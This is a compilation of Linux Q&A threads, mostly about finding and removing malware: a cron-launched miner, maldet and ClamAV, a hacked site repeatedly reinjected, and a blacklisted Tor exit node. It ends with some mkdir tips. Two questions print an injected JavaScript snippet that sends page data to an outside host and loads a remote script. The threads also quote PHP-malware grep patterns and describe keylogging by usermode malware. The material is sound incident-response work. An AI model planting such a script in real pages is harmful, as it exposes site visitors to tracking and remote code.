(Rewritten based on OP's comments) The cpu_hu process seems to execute as the postgres user, which suggests it might have been started by exploiting a weakness in your PostgreSQL database engine or its configuration. Maybe your PostgreSQL database is accessible from the internet and your database admin password is nonexistent or weak? Or are you running your project as the postgres user? That's a bad idea: a vulnerability in any component used by your project (e.g. in Django) that allowed SQL injection would then give the attacker "local admin" access to the database engine, and allow them to steal or corrupt all the data managed by that database engine, not limited to the database(s) of your project only. Database admin access also includes the privilege to run arbitrary OS commands as the database engine user.
Otherwise, make a list of every software component used in your project and their versions, and start googling for known vulnerabilities in those versions.
Do the malware processes appear if you reboot the system without an internet connection? If they do, you have a local persistent malware hiding somewhere. If not, the infection might be non-persistent, and you might be getting reinfected by another computer as soon as your system boots up.
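As a rough, hedged starting point for those checks (the pg_hba.conf path assumes a Debian-style layout and the default port 5432; adjust to your installation):
sudo ss -tlnp | grep 5432                                   # is PostgreSQL listening beyond localhost?
sudo grep -vE '^\s*(#|$)' /etc/postgresql/*/main/pg_hba.conf   # any password-less or wide-open auth rules?
sudo crontab -l -u postgres                                 # cron entries planted for the postgres user
sudo ls -la /etc/cron.d /etc/cron.hourly /var/spool/cron*   # system-wide cron entries worth reviewing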
For the past couple of days I have been observing weird processes on one of our servers. Most of the time I see multiple instances of an executable named 10, and sometimes 4, and they take a lot of CPU resources. When I examined this, I saw that the process is started by cron right after it starts a process with the executable cpu_hu, which is apparently foreign to my system; a simple search did not resolve to anything. I then examined the cpu_hu process and its exe location, and removed it accordingly (the location in the image points to a venv for a small project our team is working on). Even though I removed the binary, after a reboot it appeared in a different location and the executables 10 and 4 started from memory (no physical executable location). I deleted the cpu_hu binary from all locations on the system, stopped the process and rebooted, but after some time the cpu_hu binary appears elsewhere. For now I have stopped crond and killed the respective processes, which seems to have stopped the process from starting again. At this point I am pretty sure it's malicious. How can I get rid of this, or rather find the starting point of this malware to prevent it from starting?
Possible Malware: Unable to track starting point
maldet is the best solution for malware detection on Linux. It uses its own signature database, and can use ClamAV as an engine. I've used it for many years and it has always detected all kinds of malware on production systems.
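As a minimal sketch of a typical run (the path and the SCANID placeholder are just examples; maldet prints the real report ID at the end of a scan):
sudo maldet --scan-all /var/www
sudo maldet --report SCANID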
I looked around for an antivirus or malware scanner for Linux (Arch), stumbled on ClamAV, and I don't even remember if I got it to work, so it's fair to say it didn't make the cut at that moment in time. Are there free, good AVs for Linux? I find people saying there are no viruses for Linux and that's why there are no AVs, but I find that hard to believe. One can write malware for any system. I find it curious that an ecosystem like Linux, with deep roots in open source, seemingly does not have an open source anti-malware solution.
Are there decent, free malware solutions for Linux? [closed]
Use find with the -size option:
find . -type f -iname '*.exe' -size 133k
or
find . -type f -iname '*.exe' -size 135783c
After you confirm those are bad files, you can add the -delete option to the command to delete those files. From man find:
-size n[cwbkMG] File uses n units of space, rounding up. The following suffixes can be used: `b' for 512-byte blocks (this is the default if no suffix is used), `c' for bytes, `w' for two-byte words, `k' for Kibibytes (KiB, units of 1024 bytes), `M' for Mebibytes (MiB, units of 1024 * 1024 = 1048576 bytes), `G' for Gibibytes (GiB, units of 1024 * 1024 * 1024 = 1073741824 bytes). The size does not count indirect blocks, but it does count blocks in sparse files that are not actually allocated. Bear in mind that the `%k' and `%b' format specifiers of -printf handle sparse files differently. The `b' suffix always denotes 512-byte blocks and never 1024-byte blocks, which is different to the behaviour of -ls. The + and - prefixes signify greater than and less than, as usual; i.e., an exact size of n units does not match. Bear in mind that the size is rounded up to the next unit. Therefore -size -1M is not equivalent to -size -1048576c. The former only matches empty files, the latter matches files from 0 to 1,048,575 bytes.
My external hard disk got a Windows virus which makes lots of filename.exe copies of 132.6 kB. When I run find . -type f -name "*.exe" it finds thousands of .exe files and only 100 or 200 of them are my files. Do you know a smart way to extract the virus files and delete them all at once without losing my data?
How to delete all the "*.exe" files which are 132kb
You could compare the original image to the modified image using, e.g., cmp -l. (Which for true paranoia, you should of course do from a system you didn't run the C program on). That C program appears to just set 1984 bytes to 0:
if (lseek(fd, lba * 2048 + 64, SEEK_SET) == -1) goto err_ex;
memset(buf, 0, buf_size);
ret = write(fd, buf, buf_size);
... the rest of it looks like error checking and finding the offset at which to write those 0s. It's possible writing 0s to something could be a backdoor (not a virus), e.g., by knocking out authentication somewhere. But it strikes me as unlikely (I don't think 0x00... is a machine-code noop), and the description of what it does on the page makes more sense. You could also detect that hypothetical backdoor by verifying your packages' checksums (e.g., with debsums on Debian); writing all 0s isn't going to corrupt a program in a way that keeps its checksum good!
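A hedged sketch of both checks (the iso file names are placeholders, and debsums needs to be installed; it applies to Debian-based installs such as elementary OS):
cmp -l elementary-original.iso elementary-patched.iso | wc -l   # how many bytes actually differ
sudo debsums -s                                                 # only prints packages whose files fail their recorded checksums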
I installed elementary OS Juno on an old iMac 5,1. The computer uses a 32-bit EFI, which is not able to boot elementary OS Juno, so I decided to follow Matt Gadient's guide for a little workaround. You can find the workaround here: https://mattgadient.com/2016/07/11/linux-dvd-images-and-how-to-for-32-bit-efi-macs-late-2006-models/ I am wondering if this modified distro is still safe to use. Matt Gadient describes how to modify the isos with a little C program to make them bootable on a 32-bit EFI Mac. I did not download the isos from that site; instead I just downloaded the C program from Matt's site, which you can find as text here: https://dedicated.mattgadient.com/linux-mac-iso/isomacprog.c.txt I compiled the C program with cc -g -Wall isomacprog.c -o isomacprog and modified the official elementary OS Juno distro with it by doing something like ./isomacprog elementaryOSJuno.iso Btw: the modified iso has the same MD5 checksum as the iso modified by Matt himself, so he definitely hasn't done anything else with the distros. I burned the iso to a DVD and installed it on the iMac. It is running just fine. Yet I haven't connected the computer to the internet since I am not sure if it is still safe to use. I don't know anything about C programming, so I'd like to ask if this little C program does anything more than just making the distro bootable? Is it still safe to use this distro, or does it contain some kind of virus?
Still safe to use distro after applying c program to it?
The commands you posted do nothing useful: they run grep on files whose name ends with 2, and recursively in directories whose name ends with 2. There's a missing space after * (the space after > is permitted but not useful and more confusing than anything):
grep -iHlnr 'filesman' * 2>/dev/null
grep -iHlnr 'eval.*base64_decode' * 2>/dev/null
This searches for files containing filesman, or containing eval followed by base64_decode on the same line, in the current directory and its subdirectories recursively. The search is case-insensitive. Look at the manual of grep for the exact meaning of each option. Calling that "malware finding" is a gross exaggeration. It's probably looking for PHP malware, but it might return some legitimate files as well and it only finds a few specific malwares.
I've just spotted the lines below in a .bash_history file:
grep -iHlnr 'filesman' *2> /dev/null
grep -iHlnr 'eval.*base64_decode' *2> /dev/null
From Google I know that this is something like a 'malware finding command'. Can somebody explain what it does exactly? (I know what grep is for, but that syntax isn't clear to me.)
Explain Malware-finding function in bash
Could the malware have happened due to the outdated Apache/2.2.22 software? Possibly. There are a number of vulnerabilities against version 2.2.22 which are listed here:
http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-142323/Apache-Http-Server-2.2.22.html
As well as here on Apache's website:
http://httpd.apache.org/security/vulnerabilities_22.html
But it's much more likely that some software which runs on top of Apache was the point of entry. Outdated? I would definitely call 2.2.22 outdated. It even shows as much on the Apache download page.
I am hosting websites on Apache/2.2.22 and did a security scan. The scan said the server software is outdated; the web hosting provider says it's not outdated and is stable. Someone uploaded malware to non-www directories. Could the malware have gotten in due to the outdated Apache/2.2.22 software? This is a shared hosting environment.
Hosting on Apache/2.2.22, scan says outdated
Would this program be allowed for example: take a whole screenshot of my desktop
Under X11/X.org, yes, easily. Under Wayland it's complicated but possible.
sniff my keystrokes (for later use for sudo as an example)
Likewise.
listen or watch my microphone or webcam
Yes.
and adding itself in autostart (systemd service or gnome autostart folder, etc.) without me noticing?
Yes, for the user session autostart, i.e. ~/.config/autostart/*.desktop. Adding itself as a system service would only be possible via sudo (or kernel-level/system-service exploits), but then if it has sniffed your sudo password, it all becomes trivial.
How dangerous could it get and is there any tips how I could secure my data in case of virus penetrating my system (except for backups and not launching malware in the first place)?
You could:
run a web browser under firejail and confine it to a limited number of directories. It will not help you if you recklessly execute downloaded files.
run a web browser in a VM, e.g. KVM/VirtualBox/VMware Workstation. VMs have been escaped from, but that is a very expensive, high-grade attack which you're very unlikely to be a target of, unless the three-letter agencies are interested in you, in which case there are easier ways to infiltrate your device (e.g. hardware-level sniffers, hidden cameras planted locally, remote data collection using lasers or extremely sensitive microphones, etc.).
run a web browser on a remote PC/system - the absolute safest option.
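A hedged sketch of the firejail suggestion above (assuming firejail and firefox are installed; the exact confinement depends on the firejail version and its bundled profiles):
firejail --private firefox                 # throwaway home: nothing from the real home is visible
firejail --whitelist=~/Downloads firefox   # keep the real home but expose only ~/Downloads to the browser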
I am interested to know whether it is a reasonable decision to try and restrict my own user account as much as possible, to the point where I would need to use my own password much more frequently (now I use it only for mounting new disks and for system updates). For example, say I downloaded and opened a malicious program without administrative rights (sudo etc.) on a newly installed Ubuntu with default settings. Would this program be allowed, for example, to: take a whole screenshot of my desktop, sniff my keystrokes (for later use for sudo as an example), listen to or watch my microphone or webcam, and add itself to autostart (systemd service or gnome autostart folder, etc.) without me noticing? Of course neglecting the possibility of doing this through 0-day exploits. How dangerous could it get, and are there any tips on how I could secure my data in case of a virus penetrating my system (except for backups and not launching malware in the first place)? TLDR: How many rights does an arbitrary usermode (ring3) program have in the context of the current non-administrative user?
What is the worst thing a usermode (ring3) virus could do to home linux installation?
The short answer would be 'no'. In fact, after linking ClamAV and Maldet together, when you run a Maldet scan it will also use the ClamAV definitions, and this will actually improve performance for your Maldet scans.
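As a quick, hedged way to confirm the two are linked on a default install (the config path is the usual Maldet install location; adjust if yours differs):
which clamscan                                  # Maldet picks up the ClamAV scanner binary if present
grep -i clam /usr/local/maldetect/conf.maldet   # check whether the ClamAV integration is switched on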
I am running MalDet (malware detection) and ClamAV (anti-virus) on my RedHat 7.x server and wish to run these processes simultaneously. Other than using CPU resources, can running these two processes at the same time have a negative effect (most importantly, can one affect the other negatively)? I don't think they will, but wanted to get any advice the community may have.
Will running MalDet (malware detection) and ClamAV (anti-virus) at the same time cause any issues with the operation of each other?
Your library was probably renamed by mistake at some time from /usr/lib/libselinux.so.1 to /usr/lib/libext2fs.so.2. This doesn't prevent ldconfig from finding the expected name from the library's content (rather than the library's file name) and thus linking the "correct" name. This can be verified by copying any library to some directory and asking ldconfig to update (only) this directory. Here is the equivalent on Debian 9:
$ mkdir /tmp/foo
$ cp -aL /lib/x86_64-linux-gnu/libselinux.so.1 /tmp/foo/libmytest.so.2
$ ls -l /tmp/foo/*
-rw-r--r-- 1 test test 155400 Sep 24 2017 /tmp/foo/libmytest.so.2
$ /sbin/ldconfig -v -n /tmp/foo
/tmp/foo:
    libselinux.so.1 -> libmytest.so.2 (changed)
$ ls -l /tmp/foo/*
-rw-r--r-- 1 test test 155400 Sep 24 2017 /tmp/foo/libmytest.so.2
lrwxrwxrwx 1 test test 14 Jun 5 23:33 /tmp/foo/libselinux.so.1 -> libmytest.so.2
By the way, libselinux is a common library for software dealing with SELinux. Even the ls, cp, mv, ps commands are usually linked with it (for their respective -Z option).
Using strace I have found a behaviour of ldconfig (glibc) that I can make no sense of:
lstat("/usr/lib/libext2fs.so.2", {st_mode=S_IFLNK|0777, st_size=16, ...}) = 0
unlink("/usr/lib/libext2fs.so.2") = 0
symlink("libselinux.so.1", "/usr/lib/libext2fs.so.2") = 0
Is there any need for the shared object library for ext2fs (libext2fs.so.2) to be a symbolic link to libselinux.so.1? How does ldconfig know what to do? It does not seem logical to me that this static binary /usr/bin/ldconfig would have such a behaviour hardcoded, right? However its configuration file /etc/ld.so.conf does not help me much to clear up that mystery. What makes all of this even more confusing/suspicious is that with my distro's tools (Arch Linux) I cannot find any package the file belongs to.
$ pkgfile /usr/lib/libselinux.so.1
does not show any package, while
$ pkgfile /usr/lib/libext2fs.so
outputs core/e2fsprogs
So my question is specifically: what is the role of this libselinux.so.1 here, and how does ldconfig come to decide to create that symlink (which btw. breaks e2fsck)?
why would ldconfig create a symlink to libselinux.so.1 from libext2fs.so.2?
Check out these tools: Metasploit Framework, Nikto, chkrootkit, Nessus.
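For the two command-line ones, a minimal hedged sketch of a first run (example.com is a placeholder; only scan hosts you are authorised to test):
nikto -h https://example.com    # scan a web server for known-vulnerable files and misconfigurations
sudo chkrootkit                 # check the local system for traces of common rootkits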
I want to scan a website's complete data; what's the most reliable and user-friendly tool for that on Linux? Please suggest command-line utilities.
Scan Website Data For Malicious Code & Injections [closed]
The variable $mail is empty because the command mail is not installed. Run apt-get install mailx (debian or ubuntu) or yum install -y mailx (centos or redhat)
Postfix is running. I am trying to send a maldet report as an email, but it gives me an error and I don't know why.
[root@do ~]# maldet --report 170321-0115.21534 [emailprotected]
Linux Malware Detect v1.6 (C) 2002-2017, R-fx Networks <[emailprotected]> (C) 2017, Ryan MacDonald <[emailprotected]> This program may be freely redistributed under the terms of the GNU GPL v2
/usr/local/maldetect/internals/functions: line 608: -s: command not found
maldet(18718): {report} report ID 170321-0115.21534 sent to [emailprotected]
And this is line 608:
if [ -f "$sessdir/session.$rid" ] && [ ! -z "$(echo $2 | grep '\@')" ]; th$ cat $sessdir/session.$rid | $mail -s "$email_subj" "$2" eout "{report} report ID $rid sent to $2" 1 exit
Why is maldet not sending the report as an email?
To start with, make sure your .php and .html files are NOT writable by the uid that the web server runs as. The web server needs read and execute permissions on the files and directories but (with possibly a few exceptions like upload directories) it does not need write access to the data it is supposed to be serving. Then grep all the files in your web site (e.g. grep -ir pattern /var/www/) for something specific to this malware. That URL it reinserts is a good choice:
grep -ir 'http://www.theorchardnursinghome.co.uk' /var/www/
Unfortunately, it's possible that most of the payload of the attack is encoded with base64 or similar, so the grep may not find anything. Failing that, grepping for the files it is modifying may work - e.g. grep for header.php - if it writes to header.php, there's a reasonable chance that filename will be (hopefully unencoded) somewhere in the attack script. Grep your web log files for the same things. If your attackers managed to gain root on your server then there are endless possibilities for them to hide what they're doing. But check, at least, system crontabs, including root's crontab. BTW, this probably belongs on Server Fault rather than here. Or maybe on Webmasters.
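A hedged sketch of the crontab and log checks mentioned above (the log path assumes a self-managed Debian-style Apache box; on shared hosting such as Hostgator, use whatever log access the control panel provides):
sudo crontab -l -u root                                               # root's personal crontab
cat /etc/crontab; ls -la /etc/cron.d /etc/cron.daily /etc/cron.hourly # system-wide cron entries
sudo grep 'header.php' /var/log/apache2/access.log                    # requests that touch the file being rewritten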
One of my sites was infected with malware once, and since then every other day I am seeing the header.php files getting reverted back to older versions (possibly by a script) and a malicious script inserted somewhere in the file: <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "(>>>> KEEPS CHANGING >>>>>)http://www.theorchardnursinghome.co.uk/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script> I have cleaned the server many times but in vain. I am fully aware that the best option is to reinstall the entire site, but I am afraid it's a risky affair as too much customization has been done over the past and it will take a whole lot of effort to recreate the entire setup. How do I counter this issue? How can I identify the script(s) responsible, by running one more bash script maybe? Running inotify isn't a possibility as Hostgator doesn't allow us to install it.
Files getting reverted to older version
It could be any number of things, but the page you linked is pretty precise. Network traffic from your IP matches the pattern of an infected machine. The pattern it matches is "Win32/Zbot", so it's not likely to be your Linux box, but you also mention running a Tor exit node, which means you effectively have no idea what traffic you're allowing to go out of your IP address. There is, or was, more than likely, a Windows client connected via Tor that sent out some data that matched the pattern of this malware. Whether right or wrong, you're responsible for the network traffic leaving your network, including the stuff that originated via Tor; thus an infected machine somewhere out there on the Tor network could cause your IP to be listed. To correct the problem you have to fix the issue. You have a few options:
Stop running a Tor exit node
Restrict the Tor exit node to specific types of access
Do some SPI on the outgoing packets
Of course all of these options rather defeat the point of Tor, so ... Once the problem has been addressed, you can de-list the IP, but, as the page states, they're only going to do that a few times. Your only two real options seem to be to stop being a Tor exit node, or live with the effects of being on a CBL.
I have some experience with Linux, currently running Ubuntu 14.04.2 LTS. I've disabled (a long time ago) root login - via ssh or webmin. I've changed my tomcat's username (good luck to the f**kers in China that are still trying "tomcat", "admin" or "root"). I have ClamAV and maldetect running (finding nothing). I do run a Tor exit node (I use Tor, I like to give back, not doing anything illegal, just valuing my privacy). So I can (like to try and) understand being blacklisted for running a Tor exit node - it is under my control - but I get blacklisted for being hacked, or having a virus, or spamming, or NATting for a trojan, etc. The latest one was CBL; I've looked at all their suggestions but can't find anything. (I'm assuming that these services are not just adding me randomly.) What should I look for? Can the listing services pick up malware using my Tor exit node? (If so, how do I block it?) Many thanx
Linux and being black listed
I would probably start by using tcpdump to find the culprit. If you have a router that runs linux (many of them do), you can often run tcpdump right on your router. If not, you could try running tcpdump (or wireshark) on a PC that's on the same network as your router. This doesn't always work because ethernet switches don't always copy all traffic to all the ports. In this case, you would have to set up a machine as a router and put it in between your outside router and your internal network and then you can run tcpdump on that. Or you could find an old ethernet hub that doesn't do switching. I have an old one lying around in my kit for that purpose! Once you have a place you can reliably tcpdump from and see your network traffic that exits your network, start by finding google's ip addresses like this: $ host google.com google.com has address 74.125.21.100 google.com has address 74.125.21.113 google.com has address 74.125.21.138 google.com has address 74.125.21.139 google.com has address 74.125.21.101 google.com has address 74.125.21.102 google.com has IPv6 address 2607:f8b0:4002:c06::8b google.com mail is handled by 40 alt3.aspmx.l.google.com. google.com mail is handled by 20 alt1.aspmx.l.google.com. google.com mail is handled by 30 alt2.aspmx.l.google.com. google.com mail is handled by 50 alt4.aspmx.l.google.com. google.com mail is handled by 10 aspmx.l.google.com.Those 74.125.21.X addresses may be different from your vantage point on the net. To find out what traffic is hitting those addresses in tcpdump, use a command like this: tcpdump dst host 173.194.219.113 or dst host 173.194.219.139 or dst host 173.194.219.100 or dst host 173.194.219.138 or dst host 173.194.219.102 or dst host 173.194.219.101Now sit back and watch and see if you can spot one single host hitting google way more than another. You may want to dump the output of tcpdump into a file and use some scripting to sort it later. Save the tcpdump into a tmp like this (replace ... with arg list from above): tcpdump ... > /tmp/xthen let that run for a while and ^C it. Then use this to find out who the biggest users of google are: awk '{ print $3 }' /tmp/x | uniq -c | sort -nThe tricky part of all of this is going to be getting a machine that you can run tcpdump on that can view all the network traffic.
At my workplace we tend to get those annoying captchas once in a while when we are trying to search for something on Google. When we get that page, it says that our network is trying to access Google too fast and too many times. We suspect that there is a computer infected with some kind of virus or script running in the background and trying to do something with Google or other hosts. I was wondering what tool I can use on Linux to discover the bad node in the network, or how I can start to debug this problem.
How to know which computer is trying to access a specific host
Using ip route get $IP and ip a, it was determined that the IP address in question did not in fact belong to the server under investigation. So there is no mystery nginx running on this server; it runs on the server that does own that IP address.
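For reference, a hedged sketch of those two checks on the server (using the IP from the question):
ip route get 37.139.9.156    # which route/source address would be used to reach that IP
ip addr show                 # the addresses actually configured on this server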
I have an Ubuntu 14.04 server with Apache 2.4.7 running there, hosting one site on port 80. Today I discovered that every request to port 80 redirects to another website with response: HTTP/1.1 301 Moved Permanently Server: nginx/1.6.2 Date: Thu, 15 Jan 2015 13:37:18 GMT Content-Type: text/html Content-Length: 184 Connection: keep-alive Location: some.website.com I don't have nginx installed, but still searched for a nginx process with the ps ax | grep nginx command, with one result: 25759 pts/1 S+ 0:00 grep --color=auto nginx. It didn't seem like the offending process but still: kill 25759 yielded -bash: kill: (25759) - No such process Next, I stopped apache (it changed nothing about the redirects), and decided to see who listens on port 80 with the command lsof -i :80 | grep LISTEN which told me nothing, and if I list all listeners with the command: lsof -i | grep LISTEN I get the following list: sshd 673 root 3u IPv4 7078 0t0 TCP *:ssh (LISTEN) tinyproxy 972 root 0u IPv4 7654 0t0 TCP *:9582 (LISTEN) Xtightvnc 1173 root 0u IPv4 7914 0t0 TCP *:x11-1 (LISTEN) All of which are known entities. If I start apache the following line is also there: apache2 25926 root 4u IPv6 139312 0t0 TCP *:http (LISTEN) Next I thought about iptables, but iptables -L shows an empty list: Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination So, the question is how do I find what causes this redirect (checked from several different computers with different internet providers) and remove it? Update: 1. iptables -t nat -L yields this list: Chain PREROUTING (policy ACCEPT) target prot opt source destination Chain INPUT (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination Chain POSTROUTING (policy ACCEPT) target prot opt source destination MASQUERADE all -- anywhere anywhere How did I obtain the redirect response that you pasted into your question? Five ways: On a remote computer via Google Chrome and Charles proxy. Request with ip: GET / HTTP/1.1 Host: 37.139.9.156 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US;q=0.6,en;q=0.4 Response was as described at the beginning of the question. But on the remote computer via Google Chrome and Charles proxy with the hostname, the response was correct (no redirect). Request: GET / HTTP/1.1 Host: hostname Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US;q=0.6,en;q=0.4 On the server via curl -v http://ip * Rebuilt URL to: http://ip/ * Hostname was NOT found in DNS cache * Trying ip...
* Connected to ip (ip) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: ip > Accept: */* > < HTTP/1.1 301 Moved Permanently * Server nginx/1.6.2 is not blacklisted < Server: nginx/1.6.2 < Date: Thu, 15 Jan 2015 14:25:20 GMT < Content-Type: text/html < Content-Length: 184 < Connection: keep-alive < Location: http://www.sputton.com/ < <html> <head><title>301 Moved Permanently</title></head> <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx/1.6.2</center> </body> </html> * Connection #0 to host ip left intactOn server via curl -v http://localhost * Connected to localhost (127.0.0.1) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: localhost > Accept: */* > < HTTP/1.1 200 OK < Date: Thu, 15 Jan 2015 14:24:48 GMT * Server Apache/2.4.7 (Ubuntu) is not blacklisted < Server: Apache/2.4.7 (Ubuntu) < Access-Control-Allow-Origin: * < Access-Control-Allow-Headers: Authorization < Access-Control-Allow-Methods: POST, GET, OPTIONS < CACHE-CONTROL: no-cache < EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT < PRAGMA: no-cache < CONTENT-LENGTH: 7134 < Vary: Accept-Encoding < Content-Type: text/html; charset=utf-8 < Correct body output * Connection #0 to host localhost left intactOn server via curl -v http://hostname * Rebuilt URL to: hostname * Hostname was NOT found in DNS cache * Trying ip... * Connected to hostname (ip) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: hostname > Accept: */* > < HTTP/1.1 200 OK < Date: Thu, 15 Jan 2015 14:32:01 GMT * Server Apache/2.4.7 (Ubuntu) is not blacklisted < Server: Apache/2.4.7 (Ubuntu) < Access-Control-Allow-Origin: * < Access-Control-Allow-Headers: Authorization < Access-Control-Allow-Methods: POST, GET, OPTIONS < CACHE-CONTROL: no-cache < EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT < PRAGMA: no-cache < CONTENT-LENGTH: 7134 < Vary: Accept-Encoding < Content-Type: text/html; charset=utf-8 < Correct body output * Connection #0 to host hostname left intactSo requesting pages via hostname works, but direct ip request fails.
Unknown cause for redirect on 80 port
Firstly, I agree with the comments above: Don't use sed to recover from being hacked. You will always wonder if you missed something. Restore from backup, period. However, the literal question you asked, how to remove a long string everywhere it appears without escaping every special character, is somewhat easier to handle. I'm making some inferences/assumptions from your question which you didn't actually state directly:That the string to be removed is a single line. That it's the same each time it occurs. That it needs to be removed, not replaced with something else.If the above assumptions are correct, do the following:Put the string to be removed (including any trailing whitespace) into a file by itself, called e.g. hackline.txt. Put this one level above the directory you're going to be handling. Copy your entire directory in case of mistakes. cp -a mydir mydircopyRun the following loop on your directory (or the copy) to remove all instances of the hackline: cd mydir for f in *; do [ -f "$f" ] && [ -r "$f" ] || continue grep -vxFf ../hackline.txt "$f" > "$f.fixed" && mv -- "$f.fixed" "$f" doneThe concept here is that you use hackline.txt as a list of fixed strings that must match the entire line, then you use grep to only get the lines that don't match that list of strings. -x means "entire line"; -F means "fixed string, not regex"; -v inverts the search; -f accepts a list of patterns in a file. If your website directory is hierarchical rather than flat (which is actually fairly likely), you could use find instead of a for loop: find mydir -type f ! -name \*.fixed -exec sh -c 'grep -vxFf ../hackline.txt "$1" > "$1.fixed"' sh {} \; find mydir -type f -name \*.fixed -exec sh -c 'mv -- "$1" "${1%.fixed}"' sh {} \;Then use a recursive diff to check that everything is as it should be: diff -r mydircopy mydir
My site was hacked / infected. I replaced the url of the malicious link, but other elements in the malicious script are still making my site get blocked. Without inserting a hundred or so "escapes", how can I remove the following script from 3 dozen files on my site? < script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "hxxp://xxxxx_hack_was_here_z_s_e_r_f_._c_o_m/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('< script type="text/javascript" src="' + f_url + '">' + '<' + '/ script>');} < /script> Other pages on stack-exchange do not answer this question. To replace the malicious url with xxxx_hack_was_here etc, I used: find . -type f -name "*.php" -exec sed -i 's/zserf.com/xxxxx_hack_was here_z_serf/g' {} +
replace long text string (script with MANY special characters). sed, awk, grep
Linux is a very secure system; however, it isn't fully free of vulnerabilities. There is malware known as rootkits that can get into a Unix/Linux system and steal information, destroy data, etc. However, for a rootkit to be successful the system must be insecure or badly managed; a Linux system is only as secure as its administrator keeps it. These are the most important tasks to keep a Linux distribution secure:
Only install software from the distribution repositories (apt-get, yum...). Avoid downloading pre-packaged (.deb, .rpm) software unless it comes from very well-known sources.
Learn to use iptables and create a configuration that lets through only the traffic that you want.
Keep the system updated. The distribution repositories are updated as soon as possible when a vulnerability is discovered.
Understand user permissions and be as restrictive as possible.
Disable SSH passwords and enable login using SSH keys. Enforce the use of strong passwords.
Lock the root account, so nobody can log in as root and whoever needs root permissions will use sudo.
Install and learn to use SELinux. It will increase the basic Linux security.
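A hedged sketch of two of those items (the sed pattern assumes a stock /etc/ssh/sshd_config, and the SSH service may be called ssh instead of sshd on Debian/Ubuntu):
sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config   # keys only
sudo systemctl reload sshd
sudo passwd -l root   # lock direct root logins; keep using sudo for admin work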
Is Linux free from almost all security vulnerabilities when compared with Windows? If there are some, can I install any patches to fix them? Thanks in advance.
Is linux secure? [duplicate]
$ mkdir -p foo/bar/zoo/andsoforth
The -p parameter stands for 'parents'.
Is there a linux command that I'm overlooking that makes it possible to do something along the lines of: (pseudo) $ mkdir -R foo/bar/zoo/andsoforthOr is there no alternative but to make the directories one at a time?
recursive mkdir
This is the one-liner that you need. No other config needed:
mkdir longtitleproject && cd $_
The $_ variable, in bash, is the last argument given to the previous command. In this case, the name of the directory you just created. As explained in man bash:
_ At shell startup, set to the absolute pathname used to invoke the shell or shell script being executed as passed in the environment or argument list. Subsequently, expands to the last argument to the previous command, after expansion. Also set to the full pathname used to invoke each command executed and placed in the environment exported to that command. When checking mail, this parameter holds the name of the mail file currently being checked.
"$_" is the last argument of the previous command. Use cd $_ to retrieve the last argument of the previous command instead of cd !$, because cd !$ gives the last argument of the previous command in the shell history:
cd ~/
mkdir folder && cd !$
you end up in home (or ~/)
cd ~/
mkdir newfolder && cd $_
you end up in newfolder under home (i.e. ~/newfolder)
I find myself repeating a lot of: mkdir longtitleproject cd longtitleprojectIs there a way of doing it in one line without repeating the directory name? I'm on bash here.
Is there a one-liner that allows me to create a directory and move into it at the same time?
Function? mkcdir () { mkdir -p -- "$1" && cd -P -- "$1" }Put the above code in the ~/.bashrc, ~/.zshrc or another file sourced by your shell. Then source it by running e.g. source ~/.bashrc to apply changes. After that simply run mkcdir foo or mkcdir "nested/path/in quotes". Notes:"$1" is the first argument of the mkcdir command. Quotes around it protects the argument if it has spaces or other special characters. -- makes sure the passed name for the new directory is not interpreted as an option to mkdir or cd, giving the opportunity to create a directory that starts with - or --. -p used on mkdir makes it create extra directories if they do not exist yet, and -P used makes cd resolve symbolic links. Instead of source-ing the rc, you may also restart the terminal emulator/shell.
is there any way (what is the easiest way in bash) to combine the following: mkdir foo cd fooThe manpage for mkdir does not describe anything like that, maybe there is a fancy version of mkdir? I know that cd has to be shell builtin, so the same would be true for the fancy mkdir... Aliasing?
Combined `mkdir` and `cd`? [duplicate]
The install utility will do this, if given the source file /dev/null. The -D argument says to create all the parent directories: anthony@Zia:~$ install -D /dev/null /tmp/a/b/c anthony@Zia:~$ ls -l /tmp/a/b/c -rwxr-xr-x 1 anthony anthony 0 Jan 30 10:31 /tmp/a/b/cNot sure if that's a bug or not—its behavior with device files isn't mentioned in the manpage. You could also just give it a blank file (newly created with mktemp, for example) as the source.
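A hedged illustration of the mktemp variant mentioned at the end (using the same example target path as above):
t=$(mktemp)
install -D -m 644 "$t" /tmp/a/b/c   # creates /tmp/a/b as needed, then copies the empty file
rm -f -- "$t"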
